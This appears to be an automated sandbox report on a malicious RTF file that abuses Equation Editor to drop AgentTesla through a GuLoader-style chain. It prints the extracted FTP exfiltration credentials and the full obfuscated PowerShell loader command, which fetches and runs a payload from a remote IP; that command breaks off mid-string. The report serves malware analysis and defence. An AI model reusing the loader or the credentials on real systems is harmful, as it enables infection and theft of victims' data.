Analysis
-
max time kernel
142s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
23-04-2024 19:06
Static task
static1
Behavioral task
behavioral1
Sample
4lgeug.rtf
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
4lgeug.rtf
Resource
win10v2004-20240412-en
General
-
Target
4lgeug.rtf
-
Size
68KB
-
MD5
fff188bebcf8468642229428227ef8ff
-
SHA1
ec26be493066bcbc12abcf9d4ba374309d3ded83
-
SHA256
e3986c9a3d1d24b0cff99c78bd92d594eeb6d2a438f14ec6a44e3ef74c86c517
-
SHA512
264cbbfab0e8b4bb669f2999ced07a3bdf7312601422ff8caae3a45aca1e99b5013221b99f57135169d3824b906bcbe9edcea44db879366e957c1e224648b1a0
-
SSDEEP
1536:eeAlB6opE4g6RP3efl4+fRfcTxaxzUMcsBbOQNqOWpx6zl+03kaOAh/zRdAe+nhM:fAlB6opE4g6R84+fRfcTEbOQYOWpxo3V
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.elquijotebanquetes.com - Port:
21 - Username:
[email protected] - Password:
4r@d15PS!-!h
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 2 IoCs
Processes:
EQNEDT32.EXEpowershell.exeflow pid process 3 1736 EQNEDT32.EXE 6 2852 powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 9 ip-api.com -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 2076 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 1744 powershell.exe 2076 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1744 set thread context of 2076 1744 powershell.exe wab.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2372 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 2852 powershell.exe 1744 powershell.exe 1744 powershell.exe 2076 wab.exe 2076 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 1744 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 2852 powershell.exe Token: SeDebugPrivilege 1744 powershell.exe Token: SeDebugPrivilege 2076 wab.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2372 WINWORD.EXE 2372 WINWORD.EXE -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
EQNEDT32.EXEWScript.exepowershell.exeWINWORD.EXEpowershell.exedescription pid process target process PID 1736 wrote to memory of 2652 1736 EQNEDT32.EXE WScript.exe PID 1736 wrote to memory of 2652 1736 EQNEDT32.EXE WScript.exe PID 1736 wrote to memory of 2652 1736 EQNEDT32.EXE WScript.exe PID 1736 wrote to memory of 2652 1736 EQNEDT32.EXE WScript.exe PID 2652 wrote to memory of 2852 2652 WScript.exe powershell.exe PID 2652 wrote to memory of 2852 2652 WScript.exe powershell.exe PID 2652 wrote to memory of 2852 2652 WScript.exe powershell.exe PID 2652 wrote to memory of 2852 2652 WScript.exe powershell.exe PID 2852 wrote to memory of 320 2852 powershell.exe cmd.exe PID 2852 wrote to memory of 320 2852 powershell.exe cmd.exe PID 2852 wrote to memory of 320 2852 powershell.exe cmd.exe PID 2852 wrote to memory of 320 2852 powershell.exe cmd.exe PID 2372 wrote to memory of 1348 2372 WINWORD.EXE splwow64.exe PID 2372 wrote to memory of 1348 2372 WINWORD.EXE splwow64.exe PID 2372 wrote to memory of 1348 2372 WINWORD.EXE splwow64.exe PID 2372 wrote to memory of 1348 2372 WINWORD.EXE splwow64.exe PID 2852 wrote to memory of 1744 2852 powershell.exe powershell.exe PID 2852 wrote to memory of 1744 2852 powershell.exe powershell.exe PID 2852 wrote to memory of 1744 2852 powershell.exe powershell.exe PID 2852 wrote to memory of 1744 2852 powershell.exe powershell.exe PID 1744 wrote to memory of 1616 1744 powershell.exe cmd.exe PID 1744 wrote to memory of 1616 1744 powershell.exe cmd.exe PID 1744 wrote to memory of 1616 1744 powershell.exe cmd.exe PID 1744 wrote to memory of 1616 1744 powershell.exe cmd.exe PID 1744 wrote to memory of 2076 1744 powershell.exe wab.exe PID 1744 wrote to memory of 2076 1744 powershell.exe wab.exe PID 1744 wrote to memory of 2076 1744 powershell.exe wab.exe PID 1744 wrote to memory of 2076 1744 powershell.exe wab.exe PID 1744 wrote to memory of 2076 1744 powershell.exe wab.exe PID 1744 wrote to memory of 2076 1744 powershell.exe wab.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4lgeug.rtf"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1348
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\eveningxlamonkey.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sakkede = 1;$Glycosidase='Substrin';$Glycosidase+='g';Function Ellipsen($retninslinier){$Stigningshastighedshj=$retninslinier.Length-$Sakkede;For($Stigningshastighed=5; $Stigningshastighed -lt $Stigningshastighedshj; $Stigningshastighed+=(6)){$Haandtaskers+=$retninslinier.$Glycosidase.Invoke($Stigningshastighed, $Sakkede);}$Haandtaskers;}function Unbelieffulness($Skeletteringen){& ($Pietoso) ($Skeletteringen);}$Hable=Ellipsen 'CykelMSa dfoCitrozMalteiRy,stlAdheslBakkearelat/,some5Farao.Optrk0Ligas overc( trkWFugtdiTrimmnAutosd Uncoo,verhwscrewsOmni, CompNQuiltTSpeec Fre s1 Babe0D,aly.L.nti0 Wels;Scuti B undW Urodi SigtnBreek6 erra4Unbon;Av rt Ka edx Aq,a6 Mili4Risik; vodi Raveir SkrmvR,gni:Compa1Dyhrs2Feath1Popli.M nte0Sulfo) Fath Pha.oGUrremeEpithcIndvak ProtoPinak/Idiot2B.ase0Uneva1B aaj0Grimi0De,ol1Kanto0Bryll1hyper HarpuFAvlstiProsorTangfearrayfForsmo exadx Rupi/Te eb1 Bepr2Tvrfl1Fjerp.Mistl0Byge, ';$Desponsage=Ellipsen ' ForsU PalesStre eHester Gwer-Bi.frA .ildgcarabeSubvenTomjot mbyg ';$Blushwort=Ellipsen ' ned hMo,ntt sepatKa aspRomu :V nfr/Pr te/Fi,an2Panti3Boa.d. Pycn9Noncr5sjask.syna.6Impre0Ansig.Kalde7Unspr7Dobbe/BoltoFNy,tao Ch,arDrailvSkrd.rLovewi,oulad.onurePelvisSnrkl.T,lepp.etrosAgaladMarme ';$Forretningsstederne=Ellipsen 'S,enc> Fuel ';$Pietoso=Ellipsen 'BlikkiCrypteSuperx ande ';$Theres207='Sljt';Unbelieffulness (Ellipsen ' DrabS S.ine Webbt Avia- LignCAkt eoGylp,n BesttAndase ,tann trkt St.t Ubevi-UnblePtrevlaGa,agtBevilh.ackl MidtpTVer,e:Komma\StreeA DodemC moei PartcOp,iceGormasDybtr.A chatRou.hxDagbdtDybfr Magu-KrigsVCroona.nkeplSpritusidere .nlo Shunt$IndkaTUhde.hSti,pePlegar KonteHo nesAnt.r2 Mat 0Ly be7Unabo;Ignor ');Unbelieffulness (Ellipsen 'fr,dei SpecfDdsst Tr.s(GeocetGeirceImplasUnipotChanc-SslugpUnyokaWontot.tavrhEvalu UnparT Kong:Formf\FarveARepo.mSkubbiBes.rc LimpeCert sC ypt.FlueftJernbxPy.ost Sail)Demob{VrdileDulcixOccipiG amotRepli}M,dde;stjni ');$Albuminernes = Ellipsen '.nddreHauchc U.ifh D,nloIsoto Fl.t%SwathaAnatopWo mhpBe.endGrannaRotart ereaSkeln%Goeth\Off,nTDobbeyDingldSvin eSim,llAttr,iBiotogLabanh Woode Fored Nutle St,cn BlansTungn. .ndrSHejretUnconoSpnt. proeq&Orang&Hoved DysureE,thec .illhTilsaoHawkl Ctrfi$Polla ';Unbelieffulness (Ellipsen ' Trkv$ overgNekrolReseroDorybbBrugsa RufulNargi:AfskeB ga,ae,alvamOb.eca Ameln KnesdOver eManusnElided RetueSymbo3Wimpl4hyoli=dmodm(Pr.lic ResmmCharldun ou Fregn/IntercTurnt un,er$Kap tAGaardlInvalb,lapbuF nktm ,obai Ci.en IntweTthedrIstidn Mil e Anlgs.eden)Do be ');Unbelieffulness (Ellipsen ' dval$Forpug,orselMa,aio Skosb MoleaKlapplLoop,:MicroEFirsifBewidtArrive U avrShemolColisyArgemsEsbennParani SilknZinnngFar e=Asham$Syl,aBMan,blGenopuOatlasFr,mbhMoon wPrussoProporpolittMisgu. Lemms SaggpPretrlAdduciDust.tDjesi( Hi l$ PogrFAbro.oActuargaulorForsaeAmor tFresnnU.deriPla.en HjemgLslodsDromesBa attSdekoeByzand repeeChlorr Str,n.edimeK lor)Fagbe ');$Blushwort=$Efterlysning[0];Unbelieffulness (Ellipsen 'Repar$ ForhgAnienlLuftto SparbTricyaSpiculS mic:EndomTSubhoi SpeclInjurb Kkkea airggFortyeB.zaabCongolAel reHillov StaneTyroct iss=Unde NF.gleeBullewHerbb- inhaOReklabExterjTropeeRashlc ElietBello Ma emS eeksyTeet,sGlobetPincueSt,tam U.pe.u,wieN enereUdk,gt Deno.IndleW erte StrobSku,sCO,drelunreciLitu,eAdminnFirett pect ');Unbelieffulness (Ellipsen ' Stat$tas.wT OsteiIvorylStu,kbHandeaNamergReekieV,diub ErytlIrreveSideovSlendeK,nertbrigg.CorkiH R dieEldoraTintadZi.asePi,lerBo uns Yerb[Overs$ ambsDvirtueEnsaisRvejapSk.peo kkornD,spos EatoaVallegStatseSkri,]Match=Terma$BarviHIsoemaDue.tbLandmlFicheeSonan ');$Ulempefriere=Ellipsen '.dvarT Ry,eiFul.klbotilbDogleaE sprg Ekste ajgbVvstyl,releeUdlndv F,ereTndertDumbe.Rode D DataoColliwF,dignKeefslIlmenoLilleaF,rved G,naF ,rbeiDragalNeslaeGgem,(Unamu$ SepaBUmistlAnthouFjsinsRkebih,tjkowPrestoTil,nrHet rtNo.dm,Duble$ Dat SInterhIndicakalyprRegavkVasopeoverbrSkyll3Besla7Selsk)Renov ';$Ulempefriere=$Bemandende34[1]+$Ulempefriere;$Sharker37=$Bemandende34[0];Unbelieffulness (Ellipsen 'Fanta$Frugtg tittlLecheoZithebKlapja,nporlSprin:FourcBPseudaPartinSmaa d VexaaModtag Uniti Tr.vsHu metc,mpee CatarGradunmu.tie FlamsNedsk5Forho3vgtkl=Keren(PrintTOrdste .eilsNu,natDoere- DublP H,lla An,mt UparhGerle Rod.h$ScopeSAelurhSphenaGrnserRasgakAntrueVoldtr,inne3Conve7 indi)L,tdo ');while (!$Bandagisternes53) {Unbelieffulness (Ellipsen ' Cotw$Gherkg CudglKaolioDrabsbStefaatrla.lS.fii:suzetEF,rsgmHydroyG,rgldMyocae AudiaDissy=Hypot$ Solat ierarRectiuKnibee adon ') ;Unbelieffulness $Ulempefriere;Unbelieffulness (Ellipsen ' HavaS Brn tMi adaLnsatr SlittUnipe-LigevSDaadylPolyceRestreTi idpSlang Hundj4Akt,r ');Unbelieffulness (Ellipsen 'Enegn$EntregPr.molSplk,oCoberb.korpa Fejll Tu,g:GastrBRenteaBlindnCon.idHe.eraforesg Gebii BondsSu,katchummeBamlerUnca,nYata,e Indts.eiru5 Ualm3hippo=Boras(Pr.prT Tor eTranss Z,ndtF mkr-DirecPVanuaa UnmutSulfihAnar, Ety,o$FactoS,jlpehDobbea MilirBackikAntipeChillr Nitr3 Spec7Labor)Icono ') ;Unbelieffulness (Ellipsen 'Peppe$ForudgRetdrlKandioArbejbBordeaRaabal Cyph:St.alsHinknkSub lis.nsefUsseltdiseseRe iofF nato PrebrSok lrPastoeFiltetPopuln,naldiDobben PringudesteBrugsr SybosChoki=After$ Mer.g PejllReassoBodyubMaddiaDisrelY,sin:TelevU anyipG,byrpBlamai M,drs Tredh alfulBefoly.eath+ Feel+Ubevi%F.rud$MalerEoksesfOdy.st QuareTro.frpickelEjahuyAntydsRodskn Sheai Lucen Ledng Iodo.Paapac GgepoKommau Pas.nNongetMes,e ') ;$Blushwort=$Efterlysning[$skifteforretningers];}Unbelieffulness (Ellipsen ' Dev $ TftegW odslBeeleoSuffebGeograRetsplMisos:CytocCSkraboCommor KnopaNegrecVeludoA vinmKanceoSk,umrSubpopAn hrh NonaiM drecHaves Comm=Refa, underG GejleThioht R.od- S opCRenego Bi snAb nntScoreeLigninHoe.ttAuten In r$ Ca,dSPa hlh,ejemaDionyr Splek.ranseper ar .ank3Unpro7Faste ');Unbelieffulness (Ellipsen 'Sk tt$Lev,vgInd.slStddmoWoohobgo.era Sp,glD.mye:FiercA,prinnZwittsVenerpJgerknSkov dprogrtRorideHedwisVelma 